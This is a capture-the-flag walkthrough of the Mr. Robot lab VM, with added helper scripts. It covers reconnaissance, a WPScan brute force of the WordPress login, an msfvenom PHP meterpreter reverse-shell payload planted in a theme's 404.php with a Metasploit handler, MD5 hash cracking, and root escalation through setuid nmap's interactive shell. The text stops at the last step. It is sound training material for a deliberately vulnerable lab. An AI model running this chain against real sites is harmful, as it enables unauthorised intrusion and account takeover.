Mr. Robot CTF Walkthrough
To start, I use netdiscover to find the IP address of the VM. Once I have the IP address, I use nmap to scan for open ports and services.
After the scan completes, it reports ports 22, 80 and 443, so I see what the browser will tell us.
The webpage is very well made. We are greeted with a "Hello friend" message. Next I use Nikto, a web server assessment tool designed to find default and insecure files, configurations and programs on any type of web server (https://cirt.net/nikto2-docs/introduction.html):
nikto -h 192.168.83.160
Given the name Mr. Robot, and the Nikto results, I open the robots.txt file in the web browser.
Once opened, we see a text file and a dictionary file. I use wget to save both to my PC, then open them to see the results.
As we can see, we have our first flag!
Now it's time to see what fsocity.dic has in store for us.
Once opened, it is a very long list of words, so it is a wordlist of some sort. Looking further through the Nikto results, I notice a wp-login page. Knowing this is a WordPress site, I visit the URL and am prompted with an admin login page.
To start, I try the default username and password admin:admin and get negative results, but I notice the error says the username is invalid. Since the CTF is called Mr. Robot, I try the main character's first name, Elliot, and this time the error says the password is incorrect for the username Elliot. The login form therefore tells an unknown username apart from a wrong password, which confirms Elliot is a valid account.
I try many different passwords to get into the webpage, with no luck. The next step is brute-forcing the login with WPScan (this is the older WPScan syntax; current releases take the wordlist with --passwords):
wpscan --url http://192.168.83.160 --wordlist /YOUR_DIRECTORY/fsocity.dic --username Elliot
After 5 hours and 17 minutes, according to the elapsed time, I finally get the password I need to log in. Much of that time is wasted: fsocity.dic repeats the same words many times over, so deduplicating it first would have cut this run dramatically.
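The preparation step that shortens the brute force, as an added example that is not part of the original walkthrough: it strips CR line endings and blank lines, keeps one copy of each candidate, and reports the before/after line counts. The file names and the sample wordlist are constructed for the demo; the wpscan invocation in the comments is the walkthrough's own command pointed at the deduplicated list and is not executed here.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: prepare fsocity.dic
# before passing it to wpscan. The file repeats the same words many times, so
# a brute force that reads it as-is retries each guess over and over;
# deduplicating first removes that waste without dropping a candidate.
# Assumptions: file names below are illustrative, and the sample wordlist is
# constructed here for the demo.

# dedupe_wordlist SRC DST
# Strips CR from CRLF endings, drops empty lines, writes one copy of each
# candidate to DST and prints "<lines in SRC> <lines in DST>".
dedupe_wordlist() {
    src="$1"
    dst="$2"
    tr -d '\r' < "$src" | grep -v '^$' | sort -u > "$dst"
    before=$(wc -l < "$src" | tr -d ' ')
    after=$(wc -l < "$dst" | tr -d ' ')
    echo "$before $after"
}

# Demo on a constructed list with duplicates, a CRLF line and a blank line.
work=$(mktemp -d)
printf 'abc\nabc\n\nElliot\r\nabc\nElliot\n' > "$work/sample.dic"
echo "lines before/after: $(dedupe_wordlist "$work/sample.dic" "$work/sample_uniq.dic")"

# The brute force is then run against the deduplicated list, for example
# (not executed here; target IP and flags as used in the walkthrough):
#   wpscan --url http://192.168.83.160 --wordlist sample_uniq.dic --username Elliot
# wpscan can also confirm valid usernames first with --enumerate u.
```

The CR stripping matters because a wordlist saved with Windows line endings makes every candidate end in a carriage return, and none of them will match.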
Now I am logged in and have access. Time to make a shell to gain further access.
I generate a PHP payload with msfvenom using the following command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.83.139 LPORT=4444 -f raw
Copy the output from <?php to die(); and paste it into the 404.php template of the active theme (Appearance > Editor in WordPress), then save it.
Once the PHP is uploaded, I open Metasploit and set up a handler for the incoming session:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.83.139
set lport 4444
run
After a visit to http://192.168.83.160/wp-content/themes/twentyfifteen/404.php, I get a meterpreter session. To get a proper shell, run shell in meterpreter and then type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
This gives you an interactive bash shell with a TTY.
ls -las lists the files along with their permissions and owners.
cd /home takes you to the home folder.
cd robot takes you to the robot folder.
Once I use ls, I see the clue for the 2nd flag, so I cat the txt file.
I can see the txt file in the listing but cannot read its contents, so I move on to the next file listed.
Once opened, I have another clue for flag 2: it's an MD5 hash, so next I need to crack the hash.
The hash cracks to abcdefghijklmnopqrstuvwxyz.
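A wordlist attack on a raw MD5 hash, as an added example that is not part of the original walkthrough: each candidate is hashed and its digest compared with the target. The candidate list is constructed for the demo, and the target digest used is the MD5 of "abcdefghijklmnopqrstuvwxyz", computed with md5sum from GNU coreutils (an assumption about the tooling). It also shows the mistake that makes such attacks silently fail: hashing with echo adds a newline to the message.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: crack a raw MD5 hash
# by hashing each candidate and comparing digests (md5sum from GNU coreutils).
# The candidate list is constructed here; the target digest is the MD5 of
# "abcdefghijklmnopqrstuvwxyz", which is what the walkthrough's hash resolves to.

# md5_of STRING -> hex MD5 of exactly STRING (no trailing newline)
md5_of() {
    printf '%s' "$1" | md5sum | cut -d ' ' -f 1
}

# Common mistake: echo appends "\n", so this hashes a different message and
# a correct candidate is reported as a miss.
md5_of_echo() {
    echo "$1" | md5sum | cut -d ' ' -f 1
}

# crack_md5 HASH WORDLIST -> prints the matching word and exits 0,
# exits 1 if no candidate matches. Accepts upper- or lower-case hex and
# tolerates CRLF wordlists and a missing final newline.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    found=$(tr -d '\r' < "$2" | while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            break
        fi
    done)
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
}

# Demo on a constructed wordlist.
work=$(mktemp -d)
printf 'password\n123456\nabcdefghijklmnopqrstuvwxyz\r\nrobot\n' > "$work/words.txt"
echo "printf digest: $(md5_of abcdefghijklmnopqrstuvwxyz)"
echo "echo digest:   $(md5_of_echo abcdefghijklmnopqrstuvwxyz)  (wrong message)"
crack_md5 c3fcd3d76192e4007dfb496cca67e13b "$work/words.txt" || echo "no match"
```

Against a real list this loop is slow (one md5sum process per candidate); it is here to make the comparison explicit. A dedicated cracker does the same thing in bulk, and the same newline caveat applies when feeding it candidates.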
Next I switch to the robot user with su, and with the password recovered from the MD5 hash I have access.
I run ls again, then cat the key txt file.
Now I have the 2nd flag.
Next I use nmap's interactive shell to get the 3rd and final flag.
Older versions of Nmap supported an option called --interactive. With it, users could execute shell commands from an nmap "shell" (the interactive prompt). Those commands run with nmap's own privileges, so on a box where the nmap binary is setuid root they run as root, which is what makes this the path to the last flag.
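The check that justifies the nmap step, as an added example that is not part of the original walkthrough: commands typed at nmap's interactive prompt inherit nmap's privileges, so the trick only pays off when the binary carries the setuid bit and is owned by root (and is old enough to still accept --interactive). The helpers below enumerate setuid files and single out nmap. The directories scanned are assumptions about where binaries live; the !sh escape mentioned in the output is nmap's documented interactive-mode shell command, not something taken from this page.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the check behind the
# nmap step. Commands typed at nmap's interactive prompt run with nmap's
# privileges, so the trick only yields root when the nmap binary carries the
# setuid bit and is owned by root (and still accepts --interactive).
# Assumptions: system paths are whatever the target has; the demo scans the
# usual binary directories; "!sh" is nmap's documented interactive escape.

# is_setuid PATH -> exit 0 if the setuid bit is set on PATH
is_setuid() {
    [ -u "$1" ]
}

# owner_of PATH -> prints the owning user (parsed from ls -ld, portable)
owner_of() {
    ls -ld "$1" | awk '{ print $3 }'
}

# list_setuid DIR... -> prints every setuid regular file under DIR...
# (unreadable directories are skipped rather than treated as an error)
list_setuid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null || true
}

# check_nmap -> prints "PATH (owner)" and exits 0 if nmap is setuid root,
# exits 1 otherwise (not on PATH, not setuid, or not root-owned)
check_nmap() {
    bin=$(command -v nmap 2>/dev/null) || return 1
    is_setuid "$bin" || return 1
    [ "$(owner_of "$bin")" = "root" ] || return 1
    printf '%s (%s)\n' "$bin" "$(owner_of "$bin")"
}

# Demo: enumerate setuid files in the usual places and report on nmap.
echo "setuid binaries:"
list_setuid /usr/bin /usr/local/bin
if check_nmap; then
    echo "nmap is setuid root: 'nmap --interactive' then '!sh' at its prompt gives a root shell"
else
    echo "nmap is not a setuid-root binary on this host"
fi
```

Any other setuid-root binary in that listing deserves the same question (does it let the user run arbitrary commands?), which is how this class of escalation is found in general.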
From the nmap interactive shell, type:
id (to confirm which user you now are)
cd /root (takes you into root's home directory)
Once you are in /root, type :